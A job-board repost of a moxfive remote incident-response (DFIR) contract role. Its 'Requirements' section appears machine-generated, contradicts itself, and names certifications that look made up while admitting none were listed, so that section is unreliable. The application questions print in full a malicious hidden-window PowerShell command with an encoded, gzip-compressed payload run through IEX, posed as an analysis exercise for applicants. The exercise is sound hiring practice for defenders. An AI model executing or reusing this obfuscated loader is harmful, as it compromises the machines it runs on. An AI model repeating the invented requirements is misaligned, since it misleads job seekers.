wagey.ggwagey.gg
38,923  jobs38,923  jobs
Browse Tech JobsCompaniesFeaturesPricingFAQs
Log InGet Started Free
Jobs(38,923)/Contract Attorney Role(14)/moxfive (9) - International Contract Bench, Incident Response (DFIR)
moxfive

moxfive - International Contract Bench, Incident Response (DFIR)

Remote - International$160k - $203k4mo ago
RemoteStaffWWCloud ComputingSoftwareContract AttorneyLinuxAWSGCPAzure

Requirements

• Experience responding to threat activity as an IR consultant or SOC analyst. No specific years of experience stated; however, the posting implies a need for at least some professional level experience in incident response and security analysis. It is reasonable to infer that MOXFIVE would require candidates with substantial practical knowledge due to their role on live support work which involves real cases. • Strong understanding of Windows/Mac/Linux fundamentals, forensic artifacts, BEC (Business Email Compromise) analysis, and network analysis. No specific years or education level stated; however, the posting implies a need for knowledge in these areas as they are listed among what you'll bring to the role. • Existing knowledge of cloud computing environments such as Azure, GCP, AWS is mentioned but no required experience levels specified beyond "expanding your knowledge." This suggests that while not mandatory at this stage, some familiarity with or willingness to learn about these platforms would be beneficial for a candidate considering the growing frontier in threat investigation. • Must have certifications relevant to incident response and digital forensics (e.g., Certified Incident Handler [CIH], GIAC Certified Forensic Examiner Analyst [CFEA]). No specific certificates mentioned, but this is a common requirement within the industry that would likely be expected by MOXFIVE based on their focus and description of work they do. • Must have skills in using forensic scripts to analyze suspicious activity (implied from "You’ve got a “Tools” folder sitting on your workstation somewhere with your favorite forensic scripts at the ready"). No specific years or education level stated, but proficiency and experience are implied. • Must have skills in identifying legitimate users versus threat actor activities based on their keen sense of observation (implied from "You’ve honed a keen sense..."). Again no explicit requirement for this skill set is mentioned; however, it's an essential part of the role as described and would likely be expected. • Must have skills in handling live response work at client sites or environments without committing all waking hours (implied from "You’d love to get your fix on some live response data..."). No specific years experience stated, but it's implied that candidates should already possess this skill set as they are described as weekend warriors and late-night crusaders. • Must have skills in investigating the latest threats across various platforms (Azure, GCP, AWS) including account takeovers which is considered new malware after all (implied from "you’ve been starting to expand your knowledge on cloud-native forensics"). No specific years or education level stated. • Must have skills in threat intelligence and an investigative mindset as the role involves solving real

Responsibilities

• Responding to threat activity as an IR consultant or SOC analyst. • Strong understanding of Windows/Mac/Linux fundamentals and forensic artifacts. • BEC analysis skills. • Network analysis capabilities. • Experience with cloud-native environments, including Azure, GCP, AWS, SaaS Apps. • Ability to differentiate between legitimate users and threat actor activity based on experience of seeing them in action hundreds of times. • Curiosity about new threats and a desire to solve real cases at an intensity compatible with personal life.

Benefits

• Upload your resume here to autofill key application fields. • Drop your resume here! • Parsing your resume. Autofilling key fields... • or drag and drop here • What’s your favorite forensic artifact and why? • You find the following malicious PowerShell command during your investigation. What does it do? %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEMAMgBKAHAAVwBVAEEALwA2AFYAWABhADQAKwBpAFMAQgBmACsAMwBQADQASwBQAG4AUwBpAFIAcgB1ADkAWAA3AHIAZgBUAEQASwBBAGkAawBoAGoAbwAzAGoAQgA3AHUAMQAwAG8AQwBnAEYAQgBRAHEAaABVAEgARgAzAC8AdgBzAGUAUQBIAHQANwAzAHAAbgBKAFQAcgBJAG0AeABLAHEAaQB6AHUAMgBwADUANQB3ADYAcQBKAGoAZQBxAFQAUwB3AEUAWgBXAEoAaQBaAG0ANwBCAFEANQBDAG0AMwBoAE0AUABaAGUANwA3AFIARwBSAE0AbAArAFkAcgAvAG4AYwBPAHYASQBRAFQAWgBhAFQAdwBmAHMARwAwADMAYwAvAEkATwBoAGQATgA4ADAAQQBoAHkASAB6AFoAKwA1AEcAMABRAFAAZABaAFEAcQAzAEIAegAxADQAZAA0AGsAWgBPAGIAagBNAHAASgBOAGsASQB6AGEAagBBAEIAZAB2AGIAbgBJADMANgBWAEwAawBoAGYAbwBhAHYAMwBzADYAdABRAC8ANAAzAGMAWABVAEkAbQBZAEkAaABnAHEAdgByAE8ALwAzAGkASwB2AGIAMwB0AHYAagBJAHgAOABGAEEAZgBaAG8ATgByADgAWABNAEcAWABEAEUATAB1AEcAWQArAE8AdwBVAEcAVAArAFkAcABZAFcARAB2AEQAZABzADcASABGAGkARABKAC8ATQByAGYAdgA5ADQASgBEAEQATgAyADUAYgBJAHQANQBIAFYAawBRAEUATwB1AFoAeQBiAHMAbgBnAHMAQQBjADgAZQA1AFYAMwA3AEYAcABJAGYALwBIAEgALwBuAGkANgAxADMAdAA3AGIANgAvAGoAMwBRAG4ATABPAFQAVgBPAEsAVABZAHYAVABjAGQASgAxADkAawB2AGgAVQBUAGcANwBQAFkAeAA0AFcAOABiAEsATwBBAGgARwBSAE4ANwA1AGUAMgAxADYAagBmAHoAMQBQAHYAeAA2AG4AegBjAHUAWgA3AHYAbgBpAEoAYgBPAFAAcgBFAE0AZQB2AGcAMAB5ADAAWgBqAEsARgBQAEEAdwBWAHcASQBiAE4ATQBNAHkAWABtAGQAZgBFADMAdQB2AGIARwAvAFAAMQB3ADUAdABwADUARgBIAGIAeABmAGUAaQBSADMARgBBAGYAQgBVAEgAQgB4AHYAaAA4AEgANgBvAGUANgBhAEQAcAAzAGcATgBZAHYAawBRAGoAcwAvAGIANQBJAHYAZwBSAEkAQgBwAEYASABpAFoAQQArAEEATAB5AEIAMwBJAEQAaABkAHUAdgBjAGgAeAB5AHEARAAzADkAWABmADEAdgBoAFgARwArAEgAZwBGADkAMwBlAEYAQwBwACsARgBZAEoAZABDAGcAMgBMADUAdwBvAG4AZgBnAFEATQBZAEMATAB6AEoAMQBFAEUANABQADMAagAvAGkAVgB4AEYAKwBQADEAQQBzAEcATAB1AFcAKwA0AG4AVgBEAFcAeABnAHoAYwA2AHgAZQA4AFUAOABQADMARQAxAGQAegBOAHoAVwBzADYAeABCAEIAUABRAFMARwBoAG4AYwBwADkAWQBhAHAAbABSAGcAWQBuAGQARQBxAEMATwBEAG4ATwBXAFIARABoADQAdABzAC8ANQA1AE8AWgB2AFUAcQBHADUAVgA4AHEAcQBsADIAbABMAGoATABaADgAVwBSACsAZgBHAEYAZQBGADgAUQAyADMAMwBJADMAeABkAHkARgBQAGMAbgA2AHUAeABIAFoAagBvAG0ARAA1AFAAMgB2AHMANgBHAEgAMQA3AGEASABlADcARwBuAHUAegBhADYARQB2ADQANwArAEsAOQBuAGgAdABjAE8AVABCAFAAaQBYADcAZQBOAHcAYwA5AEMALwB2AEkAQwBtADcAMABMAE8AZwBBADQAVQBQAEIASABzAGIANQByADAAdwA5AFoATABuAE8ATwBSAFgARAB1AEkAWABnAEYAbABDAGgAKwA3ADAAeAAyAGgAbwBXADgANgBNAG4AWQBCAGYAeQB5AE8AZABEADAAZABnADEAcABoAHEAKwA3AEwANgBrAFYAWAA2ADAAbgA4ADQAVABMAHYASwBPAEgAWQBaAGwAUgBJAHMAaAB6AFYARwBaAFUAcgBEAHYAWQBMAEQATwBzAEYAOQBxAFgAVgAyAHgARQBTAFQAcABNAE0AdQBiAGkAcgBoAHcANQAxAEUAWgA2AFMASwAvAHEAMwBxADQASgArAFIAbgBTAGkAMgBtAGUAZQBKAEEAeABFAFkATABUAEIAUgBoAG0AcQBvACsAUgByAFQAcwBKAEsAbQBWAG0AYQBKAHUAWQBpADEAVgA3AGMAMwBYAGgAawA1AEYAUABtAFAAQwA2ADQAMABEAEsAZwBhAFkARABuAEEAbQBzAEoARgBpAG8ATgBPAEYATQBBAE4ANwArAEgAegArAEsAOQAxAEIAawBSAGQAZAAzAHMAQQB1ADcAMAB5AG8AMABjAFAAUQBOADEASgB4AEwAUgBxAFYAMAAwAHoAZgBZAC8ASwBnAGoAUAAzAEgANwBtAGkAZABaAFUAaQBSAFkAWABVAEgANgA1AEQAUQBRAFEASABVAEkATABUAE0ATABPADYAQgBRADEAeABMAGMALwA0ADkANAAvADgAMgA5ADcAMAB2AE0AZAAyADcAeQBBAGIANABjAFoAQwBGAE4AeABGAGMAdQBwAGsAbQA2AHAARAB0AFIAYwByAGsAQQBwAFMAOQBZAHAAcwBnAEYARgBGAEEAYgBCAE0AVABsADkAQgBDADMAbQA4AGsAdAA1AEcAMABLACsAVwAzAHIAMABFAGEATgA4AGIAbABmADIAUwA4AG4AKwA3ADUAVwA0AGcAYwA5AGUAQwByAHcAZQBDAFYAMgBZAEsAegBsAFMAVwBzAHgAbAArAFIASgBvAEsAeABuAEoAMQBGAEIAaQA0AGQAWgBHAEoAeABLAEsARgBDAG4AbQA3AGkALwBnADMAMwBiAFUAbQArAGcAbwBMADMAUwBsAEkAKwBIAGUAbgBoAEUATABiAFMAWABZAFkAMABHAEoAWgA3AE8AMABKADYAZgB6AE0ANQBCAGMAMQBxAHgAWQB2ACsAaQBKADUATwBmAFAAdQAyAE8AKwBoAEMAeAA3AFMAZQBWAGIAVwBtAGMAMwAwAC8AMgBhADIAagBQAEwAawByAEQAYgBoAFAARwBCADcAVAB2AE4AVQAyAFEASQB4AFgAUwBXAE4AUQBRAGsAVABoAHgATAA2AG0AUwB2AEkAdgBEAFUARgBwAGIAbABxAHYATQBJACsARgBVAFgAWABJAE4AMgBlAEEANABZAGcAbwAyAE0AcABUAGoAZABHAEcASwBzAGUAdABDAFQAQgBBAFgAdgArAFUAbgB1AHgARQA4AFEAbgBYAG4AOABGAFMAVgBmAFQALwBRAGsAbgBpAGwAdgB0AFEAVwBiAGYARQBGADgAYQBJAHQAZABLADAAWQBOAGUAUwBOAGUAQQBwADMAcABTAGkAdQBiAGEAWABWADEAagAwADgAZwBMAHgATQBBAEIATgBMAGEASQB5ADUAcwBJAEkAcwBVAGUAMQB2AFIARgBVADIAWABQADcARgBWAE0ARgBHAEsAZABDAE8ASQBTADgAYgAzAFMAcAAzAFIAcABYADkAVABOAEQAUQBWAGwAZwBlAEgAZQBHADQAcQBuAFgAVwBTADkAbQAzAFQANgBsADkAWQBYAFgAYwBqAEsAYQBRAC8AYwB0AFEAMwBFAHAARwBQAFcAeQBjAEcANQBFADIATwBxAE8AcQBKAEQAKwBRACsAZABDAHMANwBDAFYAMwBTAEkAeQA2AG8AVQArAGYAUwBLAEoAWABOAE0AYQBPAFMAQwBjAHcAbgBwAEQAagBUAHQAQQBtADkAZwBqAHMAbgBuAGgAMQBoAHMASAB1AGUAVABoAEcARQBJAE4ARQAyAFoAZQBxAEYARAAvAHIAdgBCAGoATAAyADcANABrAHUAOQBFAEkANABuAGoAVwBJAHcAOQAwAHQAMABLADAAaABYAFcAdAB0AC8ASgBIADMATwBJAHMAYwBLAGYAbQBhAEcAegBOAHUALwBMAFQAcwBGAHAAWgArAHEAWAA2AHMAMwBZADYAYgByAEcARgBEADgAdgA5ADUASwBCAEcAVQBkAGcANgBVADQARgBZAEIAOAB2AGQAOQArAFQAdABLAE8AVABjADQAVwBvAHgANwBHADYARQBxAEMAVwBYADYAdQB4AFQAeAAxAGMAYQBoADgATwBvAFcAagBKADcAMwBhAEQAYgA0AG4AWQBIAFMALwBKAGEAdgBFAEYAcQArAGcAbgBQAEsANQByAHMAcwB0AHkASwAwADcAYgBpAGYARwBCAFYAaAArAHAAQwBMAGcAMwBaAG4AVAA0ADgAZABWAFcAdAAvADIASgBPAGEAbQBPAGoAegB4ADAAeABlAHgASwBIAGcAdABWAGYARAAzAGIAVwBUAEwASABaADkAdABnAFoAUwA5AHAAOABMAE0ANwBqAGkAVAA2AGMASQBzAFMAeAAzAEUAeABSAHoAZABsADAAVQBlAFAAVgBnAGUAeQB4AFUANgBJAGwAKwBsAEkAZABWAFcAcwBtAHoANAA3AHQAOABjADQAWAB4AFIAaQBkAHgASQBWAGYAdwB0AG8AegA0AGMATABEAFEAbABEAGEAMwBLAHIAeQBJAG4AWQA1ADcAVQBqAEYANQA3ADMAUQBkAEcAYQBEAFIAcgB0AGkAZABiAHEAMQBTAEkAMgBrAEoAKwBRAHMAeQBVAE8ALwBIAGMAOABQADQANwA0ADQAMQBsADQAbQA2AC8AbQBxAHEAYQAyADEANgBYADYAdAAxAGwAbgBOAEoAcQB2AFIAdwA4AGkAUgBtAG4AYQBuAG8AbgBKAEIANgB5AFYAYwA5AEIAcwBlAE0ATgB4ADIAeABxAEgAaABWADgAegB1AFkAdgBNAGkAYQB0AE8AVwBpAG8AVABGAFQAZwB5AFEASgB1AG4AagBRADIAZQB5AE0AKwBYAG0AcwBzAFAAdgBhAHQAaQBlAE8AaQAzAFAAZABvAHgAcAA3AGUARABiAHQARwBhAFkAaABxAFUANABMACsAMQBwAG8ANgA1ADAAZAByAE8AYQB0AEQAeAB5AG4AZQBsADYAaABzACsAbQBXADcAVQBFACsANQBrAGIAcQArAG8AVABVAGwAMQB1AE0AeABCAEUAWgBlAGEAVAAzAGwAUABvAGIAWgBVAGwAUABqAC8AMABqAEYASABGADYATwA4ADYAVQBBADUAaQBhAGQARgBaAGQAcQBaAE4AKwBTAEEAagBqAGkAeABxAFIAegByAFoAQgB0AEsAcQBaAGkAeQAxADAAZgA2AEkARABhAEcAaQBkAEMAVABuAHAAVABmAHEAeABlADAASgBHADkAVgBGAEwAcAB6AGIAKwArAE8AegBXAEEAcABPAHIAZABuAG8ATABEAFEAVgBvAGEAbwBDAEYANgAzAGQARwBYAGkAOABCAFUANABiADgASgB4AFIAUABEAEcAawBCADcAUgB4AGcARwBOAE4AMgBVADkAeQA1AFkAegAyAHgAQgBhAFYALwBYAHoARQAwAGYATQBjADUAaQBJAC8ATgAxAFoAWQBhACsAOQBXAHMAZgBzAFEAeQBFAE8ANgB0AHEAbwBvADYARQBHAE8ANgAwAHUAcAB3AHgAcwBsADAAcABhADMAWABGADgAZAAxAEsAcAA0AHkASwBFAGwAZQAxAHkAeABRAHEAMgBxAEQANABkAHAANwBoADIAVABDAHIAWQBtAEEAZgBRAGsAcAArAFMAZQAvAHgAOABEAC8AMwBjAE8AegBhAHAAWgBVAHEATwBnAE0AawBIAFIAUwA5AFoATABwAFcATABTAEsAMwB5ADgAZQBiADAAOQB2AFYAMQA3AHUANAAvADUAbgBYAEUAQwBiAGIAVgBhAEsAeQBsADQANgBhAHQARAAwAGcARAArAFcANQBzAGwANgAwAEYAbwA2AFEANgBVAFAAKwBoADYAcgBuAGYAVwBnAEEAUwBEAFMAKwArAGkARQBEAHUAUgBLAEIAUgArADMAbQA3AHYAYwBPAEIAaABCADEAcABSAGEARgBhAHYAbABaADUAMQBIAEkASwBTAGIAdQBzAFgAYgBRAC8AMABmAGwAbABIADkAZwBZADMAMgBoAHkARwBqAGYAcABQAFIAMABYAG8AdwBpADgAYgBvAGMAWABLAFkAagBLAGkAOQBUAHIAdABTAEMANABSAFgAaAB1AHoANgA4AGIASAB4AHgAYwBJADcAMwBLAHgAcABDAGcAKwBZAFcAOQBEAHIAVABKAFQAUABUAFcAcQBWAFcAaQBuAHEAcQBkAG0AdABaAGoANwBmAFYAaAA0ADQAcwBkAFoAdQA1AGUAbwBBAC8AbQBMADgAcwB5AFQAegA1AGEAYwAxAEIASQBjAGEAMwBiAFAAUgBaADcANwArAFoANwA1AHIAdwBmAHcAbgBkAEYALwBoAHoAWQBCAEwAMgAzAHEAUABxAEIATABIAGYAbwA1AFgAcwBWAGMALwBtAHMAdQBKADYANwAvAEEAZgB6AHgATQBiAFQAUAA4AE0AbQBDADkAMAB3ADMASgBWADkASQA5AFkARABlAGIAWQBrAEIAMwB6AGYAcABoAFYAMgA0ADEAWQB1AE0AMgBOAGUAWQBXADUAMwA1AHgAdAB4AEIAZQBHAHoAWQBxAE0ATgBIAFQAcgBDAEoAawB0AHUAYgB5AGIANwBaAC8AbQBLAE8AdQBwADAASgAvAHMAVgBNAE0AYwBMAFEAYwA5ACsATgBpAEEARQBzAHgAZABDAEUASgBhAHAAVABKAGMAbgBtADMATABmAGMAMwB3AG8ANAB0AFMANABFAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= • On a scale from “white and fluffy” to CloudTrail Creator, how would you rate your cloud-native forensics skills across AWS, GCP, and Azure Cloud? • What’s your availability look like on an average week to take on live response analysis work?

Apply in one click

Upload My Resume

Drop here or click to browse · Tap to choose · PDF, DOCX, DOC, RTF, TXT

Apply in One Click
Apply in One Click

Similar roles

dash0dash0 - Partnerships Manager4mo ago
·Amsterdam, Netherlands, European Union·Equity
RemoteEMEASeniorCloud ComputingDeveloper ToolsPartnership ManagerContract AttorneyAWSGCPAzureBusiness DevelopmentPrometheus
moxfivemoxfive - Contract Bench, Incident Responder (DFIR)4mo ago
·Remote - USA *·$166k - $208k/year
RemoteNAStaffCloud ComputingSoftwareContracts ManagerLinuxAzureGCPAWS
wiz.iowiz.io - Threat Detection Researcher (Windows/Linux)2mo ago
·Unknown
In OfficeWWSeniorCloud ComputingSecurity AnalystKubernetesAWSGCPAzureLinux
Symmetry SystemsSymmetry Systems - Lead Forward Deployed Engineer (FDE)5mo ago
·Hybrid·$101k - $101k/year + Equity
RemoteWWStaffCloud ComputingTech LeadSupport EngineerMobile EngineerAWSAzureGCPClaude
ZscalerZscaler - Principal Specialist Sales Engineer - ZT Cloud, Enterprise - East3d ago
·Hybrid·$171k - $171k/year + Equity
In OfficeWWPrincipalCloud ComputingSales EngineerCommunity ModeratorAzureAWSGCP
Palantir TechnologiesPalantir Technologies - Commercial Contracts Specialist5mo ago
·New York, NY·$90k - $130k/year + Equity
In OfficeNAMidSoftwareContract AttorneyProspectingContract DraftingReportingClose
moxfivemoxfive - Senior Consultant, DFIR3mo ago
·United States·$100k - $150k/year
RemoteNASeniorCloud ComputingSoftwareSenior AdvisorSenior DeFi DeveloperGCPAWSAzureLinux
moxfivemoxfive - Senior Consultant, DFIR (Wed-Sun)4mo ago
·Remote - USA·$100k - $150k/year
RemoteNASeniorCloud ComputingSoftwareSenior AdvisorSenior DeFi DeveloperLinuxAWSGCPAzure
RunwayRunway - Engineering Manager, API4mo ago
·Remote·$280k - $340k/year
RemoteWWStaffCloud ComputingNonprofitEngineering ManagerTeam LeadTeam ManagementAWSGCPTypeScriptAzure

Browse more by category

Show 14 moreContract AttorneyShow 992 moreLinuxShow 3,841 moreAWSShow 1,568 moreGCPShow 1,657 moreAzure
Privacy·Terms··Contact·FAQ·Wagey on X